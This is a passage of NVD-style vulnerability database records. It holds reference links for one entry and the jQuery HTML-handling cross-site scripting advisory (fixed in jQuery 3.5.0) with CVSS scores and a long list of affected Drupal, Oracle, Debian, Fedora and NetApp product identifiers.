"https://lists.apache.org/thread.html/2ac0327748de0c2b3c1c012481b79936797c711724e0b7da83cf564c%40%3Cuser.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/895164e03a3c327449069e2fd6ced0367561878b3ae6a8ec740c2007%40%3Cuser.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/d88b8823867033514d7ec05d66f88c70dc207604d3dcbd44fd88464c%40%3Cuser.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e%40%3Cannounce.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/2ac0327748de0c2b3c1c012481b79936797c711724e0b7da83cf564c%40%3Cuser.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/895164e03a3c327449069e2fd6ced0367561878b3ae6a8ec740c2007%40%3Cuser.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/d88b8823867033514d7ec05d66f88c70dc207604d3dcbd44fd88464c%40%3Cuser.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-611", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2020-04-29 22:15
Modified
2024-11-21 04:56
Severity ?
6.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:*", matchCriteriaId: "B5CFA4CA-5296-4B78-8D65-34FC63A09DEF", versionEndExcluding: "3.5.0", versionStartIncluding: "1.2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "70C672EE-2027-4A29-8C14-3450DEF1462A", versionEndExcluding: "7.70", versionStartIncluding: "7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "BBFE42E2-6583-4EBE-B320-B8CF9CA0C3BC", versionEndExcluding: "8.7.14", versionStartIncluding: "8.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*", matchCriteriaId: "7BA49DB0-ECC3-4155-B76C-0CA292600DE6", versionEndExcluding: "8.8.6", versionStartIncluding: "8.8.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", matchCriteriaId: "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", matchCriteriaId: "36D96259-24BD-44E2-96D9-78CE1D41F956", vulnerable: true, }, { criteria: "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", matchCriteriaId: "E460AA51-FCDA-46B9-AE97-E6676AA5E194", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A079FD6E-3BB0-4997-9A8E-6F8FEC89887A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A125E817-F974-4509-872C-B71933F42AD1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", matchCriteriaId: "BBE7BF09-B89C-4590-821E-6C0587E096B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", matchCriteriaId: "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", matchCriteriaId: "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", matchCriteriaId: "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", matchCriteriaId: "18127694-109C-4E7E-AE79-0BA351849291", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", matchCriteriaId: "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "D0DBC938-A782-433F-8BF1-CA250C332AA7", versionEndExcluding: "21.1.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:*", matchCriteriaId: "B796AC70-A220-48D8-B8CD-97CF57227962", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*", matchCriteriaId: "790A89FD-6B86-49AE-9B4F-AE7262915E13", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E39D442D-1997-49AF-8B02-5640BE2A26CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\\::*:*:*:*:*:*:*:*", matchCriteriaId: "FAFED7F5-03FA-43B5-AD13-1130F0324448", versionEndIncluding: "8.2.2", versionStartIncluding: "8.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:*", matchCriteriaId: "1A0E3537-CB5A-40BF-B42C-CED9211B8892", versionEndIncluding: "16.4.0", versionStartIncluding: "16.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", matchCriteriaId: "062E4E7C-55BB-46F3-8B61-5A663B565891", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:*", matchCriteriaId: "726DB59B-00C7-444E-83F7-CB31032482AB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B095CC03-7077-4A58-AB25-CC5380CDCE5A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:*", matchCriteriaId: "7015A8CB-8FA6-423E-8307-BD903244F517", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "F2BB6A71-6AF6-4C0B-9304-4111E32108D4", versionEndIncluding: "8.1.0.0.0", versionStartIncluding: "8.0.6.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "AD080793-FC45-4260-8E45-40E228F432FC", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "2ACA29E6-F393-46E5-B2B3-9158077819A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "FCD1EC13-CC2F-4668-90D2-D8609066F2DF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "4D614F76-0AA1-4EA8-A24A-38EFC90EF5DB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "39B8DFFF-B037-4F29-8C8E-F4BBC3435199", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "4D0D0EAC-300D-44B1-AD4A-93A368D5DBA1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:*", matchCriteriaId: "C5E0646D-4866-41FB-AE2E-5307B6F4004A", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "8A566893-8DCF-49E4-93D0-0ACCEFD70D3D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:*", matchCriteriaId: "B37FC113-4F40-4D29-8712-7AD250373008", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "00E5D719-249D-48B8-BAFC-1E14D250B3F6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "712577A9-04D6-4579-A82B-72200E467399", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:*", matchCriteriaId: "672949B4-1989-4AA7-806F-EEC07D07F317", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "987A0C35-4C7F-4FFB-B47B-37B69A32F879", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "8B3B6BE3-4C5A-402F-832C-86A0A6234C25", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "9476D1DA-C8A8-40A0-94DD-9B46C05FD461", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "34070F24-2E53-43EC-9117-E1434B2C4C2B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "B9B2C2F6-235F-4E78-A299-18C041C05C9A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F727AAC6-6D9F-4B28-B07C-6A93916C43A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:*", matchCriteriaId: "6662C783-5B5C-4559-89F5-1A681AA46A3E", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "51C17460-D326-4525-A7D1-0AED53E75E18", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "37C8EE84-A840-4132-B331-C7D450B1FBBF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "1D8436A2-9CA3-4C91-B632-9B03368ABC1B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "6149C89E-0111-4CF9-90CA-0662D2F75E04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "6CDDF6CA-6441-4606-9D2F-22A67BA46978", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "6FA0B592-A216-4320-A4FE-ABCA6B3E7D7A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "CEA4D6CF-D54A-40DF-9B70-E13392D0BE19", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:*", matchCriteriaId: "2A333755-4B6E-4A0F-AC48-4CEA70CD5801", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "397B1A24-7C95-4A73-8363-4529A7F6CFCC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "EF6D5112-4055-4F89-A5B3-0DCB109481B7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "D262848E-AA24-4057-A747-6221BA22ADF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "4A01F8ED-64DA-43BC-9C02-488010BCD0F4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "75638A6A-88B2-4BC7-84EA-1CF5FC30D555", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "501B9331-6BB7-44BF-A664-180CAFABF88C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "F2A3AE3C-8E24-4FB6-9954-9B50CBD59B21", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F8E565DA-91BE-44FC-A28F-579BE8D2281A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:*:*:*:*:*:*:*:*", matchCriteriaId: "AED72F90-3B68-45AC-865C-110F7FD30D37", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:*", matchCriteriaId: "4F909C61-1A74-402C-B74F-BAF7297875B0", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:*", matchCriteriaId: "26A1F27B-C3AC-4D13-B9B2-2D6CF65D07BC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:*", matchCriteriaId: "B95E8056-51D8-4390-ADE3-661B7AE1D7CE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.1:*:*:*:*:*:*:*", matchCriteriaId: "609D6EDF-D4D0-4370-9B8B-CA39D41946C0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9059A907-508B-4844-8D7B-0FA68C0DF6A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*", matchCriteriaId: "2AC63D10-2326-4542-B345-31D45B9A7408", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:*", matchCriteriaId: "7BFD7783-BE15-421C-A550-7FE15AB53ABF", versionEndIncluding: "19.1.2", versionStartIncluding: "19.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:*", matchCriteriaId: "1F7BF047-03C5-4A60-B718-E222B16DBF41", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:*", matchCriteriaId: "E3A73D81-3E1A-42E6-AB96-835CDD5905F2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:*", matchCriteriaId: "66136D6D-FC52-40DB-B7B6-BA8B7758CE16", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "06514F46-544B-4404-B45C-C9584EBC3131", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "3BD4BF9A-BF38-460D-974D-5B3255AAF946", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "B7DB4831-F874-4D9D-AB58-BE4A554891EA", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:*", matchCriteriaId: "B47C73D0-BE89-4D87-8765-12C507F13AFF", versionEndIncluding: "5.6.0.0", versionStartIncluding: "5.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:*", matchCriteriaId: "5B8AA91A-1880-43CD-938D-48EF58ACF2CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", matchCriteriaId: "D0A735B4-4F3C-416B-8C08-9CB21BAD2889", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "7E1E416B-920B-49A0-9523-382898C2979D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:*", matchCriteriaId: "15512D27-7BEB-4DDD-9A1B-447FC7156E3D", versionEndIncluding: "12.2.20", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", matchCriteriaId: "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:*", matchCriteriaId: "90F0B2AB-453C-4585-8753-74D17BD20C79", versionEndIncluding: "12.2.20", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:*", matchCriteriaId: "31C7EEA3-AA72-48DA-A112-2923DBB37773", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "F0735989-13BD-40B3-B954-AC0529C5B53D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", matchCriteriaId: "9EFAEA84-E376-40A2-8C9F-3E0676FEC527", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:*", matchCriteriaId: "959316A8-C3AF-4126-A242-3835ED0AD1E8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", matchCriteriaId: "BDB925C6-2CBC-4D88-B9EA-F246F4F7A206", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:*", matchCriteriaId: "98B9198C-11DF-4E80-ACFC-DC719CED8C7E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:*", matchCriteriaId: "6953CFDB-33C0-4B8E-BBBD-E460A17E8ED3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B40B13B7-68B3-4510-968C-6A730EB46462", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "C93CC705-1F8C-4870-99E6-14BF264C3811", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:*", matchCriteriaId: "FD1FCB0D-3E19-4461-9330-4D7F02972A35", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", matchCriteriaId: "F1BE6C1F-2565-4E97-92AA-16563E5660A5", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "B9273745-6408-4CD3-94E8-9385D4F5FE69", versionEndIncluding: "3.1.3", versionStartIncluding: "3.0", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:*", matchCriteriaId: "9F4754FB-E3EB-454A-AB1A-AE3835C5350C", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "6770B6C3-732E-4E22-BF1C-2D2FD610061C", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*", matchCriteriaId: "9F9C8C20-42EB-4AB5-BD97-212DEB070C43", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "7FFF7106-ED78-49BA-9EC5-B889E3685D53", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*", matchCriteriaId: "E63D8B0F-006E-4801-BF9D-1C001BBFB4F9", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "56409CEC-5A1E-4450-AA42-641E459CC2AF", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*", matchCriteriaId: "B06F4839-D16A-4A61-9BB5-55B13F41E47F", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "108A2215-50FB-4074-94CF-C130FA14566D", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*", matchCriteriaId: "7AFC73CE-ABB9-42D3-9A71-3F5BC5381E0E", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*", matchCriteriaId: "32F0B6C0-F930-480D-962B-3F4EFDCC13C7", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*", matchCriteriaId: "803BC414-B250-4E3A-A478-A3881340D6B8", vulnerable: false, }, ], negate: false, 